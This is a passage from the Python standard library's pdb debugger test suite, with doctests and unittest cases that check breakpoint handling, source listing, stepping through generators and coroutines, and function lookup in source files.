1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def test_pdb_breakpoints_preserved_across_interactive_sessions():
"""Breakpoints are remembered between interactive sessions
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'import test.test_pdb',
... 'break test.test_pdb.do_something',
... 'break test.test_pdb.do_nothing',
... 'break',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) import test.test_pdb
(Pdb) break test.test_pdb.do_something
Breakpoint 1 at ...test_pdb.py:...
(Pdb) break test.test_pdb.do_nothing
Breakpoint 2 at ...test_pdb.py:...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'break pdb.find_function',
... 'break',
... 'clear 1',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) break pdb.find_function
Breakpoint 3 at ...pdb.py:97
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 1
Deleted breakpoint 1 at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'clear 2',
... 'clear 3',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 2
Deleted breakpoint 2 at ...test_pdb.py:...
(Pdb) clear 3
Deleted breakpoint 3 at ...pdb.py:...
(Pdb) continue
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(os_helper.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(os_helper.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], os_helper.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, os_helper.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(os_helper.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
